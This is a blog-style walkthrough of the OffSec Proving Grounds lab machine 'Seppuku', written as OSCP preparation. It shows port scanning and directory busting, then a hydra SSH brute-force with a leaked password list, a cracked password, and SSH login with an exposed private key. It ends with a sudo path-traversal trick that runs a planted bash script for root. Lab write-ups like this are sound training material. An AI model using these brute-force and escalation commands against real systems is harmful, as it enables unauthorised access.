Offensive Security Proving Grounds (Seppuku)
Offensive Security offers free lab machines under their “Proving Grounds” library that I find super helpful to prepare for the OSCP. I will be walking you through my experience with an “Easy” level machine called Seppuku which honestly it was not an easy machine. The machine presented rabbit holes along with teaching you how to enumerate as much as possible. I learned that you should try any credentials or keys you find on all possible users presented on the system and not stay fixated on just one. The japanese samurai related references were pretty cool on this machine!
This machine had an overwhelming number of open ports. I would say this is pretty close to some of the machines they give you on the exam…
Nmap scan report for 192.168.163.90
Host is up, received user-set (0.079s latency).
Scanned at 2024-02-01 20:21:34 PST for 125s
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhKnaNVJ/YnScPD1GDZSIfyC/a4jjHhSnoEgi2c/c03kE4JVZbA4cTFeEHGq4PFTyiuchv9w9zNu8XtVIDhILb9K4D38EssujmpekrrAnYkS0yU8Kqas1+3FCY8xjz6a5yVdMk/aQVa4BfFXWnv+rdlio0ZFVdLDaRaG90KMUEVw18Ogzt9lBbnbf7gOR0EGPKW0xzyDyI70u5FJnarDFV9jCZL/flcCL0m+MAycgdFyFqCOTjNxd8Qn2R3rnhgjSER5C9c+qEI/htLmtnXTC0p6AMeTDjO3J57LEB1WFYJ4wkeuEUtPadfhwgDR16XqWmqw2HcBIj1W9H9V47KFfR
| 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC+yj9GRgyn2boC7Dw9un6PEwviM8NZ1CRTjmrHRFiOT+0co+OOwxD5RRQCxuS22zJgsiDIEka8ypTjYWlnJ9T8=
| 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIESejQ038eElmlRfbqAgaRSK120jvrz9WQ5UcjxJdJ71
80/tcp open http syn-ack ttl 61 nginx 1.14.2
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
|_http-title: 401 Authorization Required
|_http-server-header: nginx/1.14.2
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/empowerid syn-ack ttl 61 LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to https://192.168.163.90:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/dnQualifier=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/initials=CP/name=openlitespeed/emailAddress=mail@seppuku
| Issuer: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/dnQualifier=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/initials=CP/name=openlitespeed/emailAddress=mail@seppuku
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T06:51:35
| Not valid after: 2022-08-11T06:51:35
| MD5: 2002:61c4:9f2d:6bfa:21d1:477c:21d9:e703
| SHA-1: e44a:c855:93ba:b3f8:b2f3:7ce5:db7f:a350:2f49:c7ca
| -----BEGIN CERTIFICATE-----
| MIIENTCCAx2gAwIBAgIUTA/1/lqL0wXtcQz9EwctzIvjfkYwDQYJKoZIhvcNAQEL
| BQAwgccxEDAOBgNVBAMMB3NlcHB1a3UxCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdW
| aXJ0dWFsMRswGQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rl
| c3RpbmcxCzAJBgNVBAgMAk5KMRswGQYJKoZIhvcNAQkBFgxtYWlsQHNlcHB1a3Ux
| FjAUBgNVBCkMDW9wZW5saXRlc3BlZWQxCzAJBgNVBCsMAkNQMRYwFAYDVQQuEw1v
| cGVubGl0ZXNwZWVkMB4XDTIwMDUxMzA2NTEzNVoXDTIyMDgxMTA2NTEzNVowgccx
| EDAOBgNVBAMMB3NlcHB1a3UxCzAJBgNVBAYTAlVTMRAwDgYDVQQHDAdWaXJ0dWFs
| MRswGQYDVQQKDBJMaXRlU3BlZWRDb21tdW5pdHkxEDAOBgNVBAsMB1Rlc3Rpbmcx
| CzAJBgNVBAgMAk5KMRswGQYJKoZIhvcNAQkBFgxtYWlsQHNlcHB1a3UxFjAUBgNV
| BCkMDW9wZW5saXRlc3BlZWQxCzAJBgNVBCsMAkNQMRYwFAYDVQQuEw1vcGVubGl0
| ZXNwZWVkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8SVGtfXTfTSO
| N6Umrvf+GIwkhWZe0KJ37rASVks61rn4yIVuQNzQwDWDBuw1IZD9SHnWWm8ejHmb
| M84sP4n9OCJYlnWrjFfAouH3IFku40Zx9JyVkGTeNA3HrFNN7WkX6yq2wHDHTqn+
| SeEX9pax9RAk1mm+DZBfZGqkkiZCu/IO2Ro1kHYTnlnvQmj1y07RkdcumVyVNZzi
| qJxrIZSl7EIUMEQfmkaX8RYigcfn6RsFkFdWPZ9JanNTBVBNrZptegtW6zH/R/Gu
| CUk7nbzqDm0u6Cs+6IWwENDkfELUBFkEW0rrDFxYhhJ1NmPa3bnLRYuU8RxGiVyN
| 9BEXNFg1rwIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0B
| AQsFAAOCAQEA1n5K+UR3K91RltYeVilcq5/ynOHQiDrUZ5zi+/ZmYIUpoOakXzHv
| Pz8+gOSQ8fLch1ZUtkkAv8i5zaYJZ/WDMs4V6R80h9w9NOANKNOPCrWB1jWteBGG
| OSGn2Wbd4Ii0rKYFfmxoEags6MRklyFXE0rQoSlgUFsIQaPiisjv2xnm0GgoVmS8
| tUfRimAXsoBLgl5ZzT56MlfX5QSrqYy6UAtBeIc7R4C7lWcpay91b8JCXsGspjfX
| OBnzFQJ3tuMvtsDWD1NBPGWH5LpWRiaLalyz63KvWKdD3pr/5l2OKgU49qOVU/lQ
| NLEdNCP2sRzfHH/lXlwPhsm5MEtbf5tDKg==
|_-----END CERTIFICATE-----
|_http-server-header: LiteSpeed
|_ssl-date: TLS randomness does not represent time
7601/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Seppuku
8088/tcp open http syn-ack ttl 61 LiteSpeed httpd
|_http-title: Seppuku
|_http-server-header: LiteSpeed
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Aggressive OS guesses: Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.39 (87%), Linux 3.10 - 3.12 (87%), Linux 3.4 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.4 (87%), Synology DiskStation Manager 5.1 (87%), WatchGuard Fireware 11.8 (87%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/1%OT=21%CT=1%CU=39907%PV=Y%DS=4%DC=T%G=Y%TM=65BC6
OS:E4B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%TS=A)OPS(O1=M551
OS:ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=
OS:M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=
OS:Y%TG=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N
OS:)U1(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=ADA4%RUD
OS:=G)IE(R=Y%DFI=N%TG=40%CD=S)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 14.228 days (since Thu Jan 18 14:54:58 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m13s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: seppuku
| NetBIOS computer name: SEPPUKU\x00
| Domain name: \x00
| FQDN: seppuku
|_ System time: 2024-02-01T23:23:25-05:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48327/tcp): CLEAN (Couldn't connect)
| Check 2 (port 61019/tcp): CLEAN (Couldn't connect)
| Check 3 (port 36201/udp): CLEAN (Timeout)
| Check 4 (port 10716/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-02-02T04:23:27
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredOffsec wants to confuse you with all of these ports but I did not let it discourage me. I noticed a ton of webports open, and the ones that really stood out to me was 7061. Autorecon has a built-in directory busting tool called Ferox Buster, which detects a ton of exposed web endpoints.
There were two directories that I discovered to be interesting, /secret, and /keys. I did a wget on each file that could be useful, grabbing the ssh keys, password files, and taking note of the hostname seppuku.
“Seppuku” (切腹) is a traditional Japanese term that refers to a form of ritualistic suicide by disembowelment. This act involves a person, typically a samurai or someone from the warrior class, deliberately cutting open their own abdomen with a sword or other sharp object. Seppuku is also known as “harakiri” (腹切り), which literally means “belly-cutting” in Japanese.
I saw that there was a password list in the directory, along with some other goodies in the directory. I tried using John the Ripper to crack the shadow file hash but had no luck. Not to mention the username with the hash was “Rabbit-hole” cmon…
My next step was noticing that the system had port 22 open, so why not try brute-forcing it with the provided password list?
sudo hydra -l seppuku -P password.lst 192.168.248.90 sshSure enough, I got a snag!
username: seppuku
password: eeyoreesudo ssh -oHostKeyAlgorithms=+ssh-dss seppuku@192.168.248.90
Got the user flag and started to aim at getting root next. The first thing I do getting on a machine is run sudo -l.
The sudo -l command is used to list the privileges and allowed commands that a user has when executing commands with sudo.
I saw that seppuku can run the following command as root /usr/bin/ln -sf /root/ /tmp/
The shell was restricted when trying to cd into other directories and I saw that this was creating an issue so I did research on the error “restricted” and came across several ways on fixing this.
I had to exit my ssh sessiona and fire up and new one with the follwing command:
sudo ssh -oHostKeyAlgorithms=+ssh-dss seppuku@192.168.248.90 -t "bash --noprofile"I had no luck leveraging seppuku’s sudo capability for the ln command. My next step was to revisit that private key file I discovered in the /keys web directory and try and ssh to my next victim tanto since looking at the /etc/passwd we have a few users.
In Japanese, “tanto” (短刀) refers to a type of short sword or dagger. The term “tanto” is often used to describe a specific style of Japanese blade that typically has a blade length between 6 to 12 inches (15 to 30 centimeters). Tanto blades can be single-edged or double-edged, depending on their intended use and design.
Ran the following commands on my attack machine:
wget http://192.168.248.90:7601/keys/private
chmod 600 private
sudo ssh -i private -oHostKeyAlgorithms=+ssh-dss tanto@192.168.248.90 -t "bash --noprofile"
I looked around for quite a bit then noticed that seppuku had an interesting .passwd file in their home directory.
Since we already can get into tanto’s and seppuku’s account why not try this password via ssh to samurai’s account.
In Japanese, a “samurai” (侍) refers to a member of the warrior class in feudal Japan. The term “samurai” is often associated with the traditional Japanese warrior elite who lived during a specific historical period, known as the “Edo period” (1603–1868). However, the origins of the samurai date back to earlier periods in Japanese history.
sudo ssh -i private -oHostKeyAlgorithms=+ssh-dss samurai@192.168.248.90 -t "bash --noprofile"I ran sudo -l again and noticed I could run another command as root.
Well, this command did not work because there is no such directory or file in tanto’s directory. My next thought was to go back onto tanto’s machine and create a folder along with the file so I can call it with that command after.
sudo ssh -i private -oHostKeyAlgorithms=+ssh-dss tanto@192.168.248.90 -t "bash --noprofile"
mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -laLogged out of tanto’s machine and went back to samurai’s and ran the following to get root.
sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cat /root/proof.txt
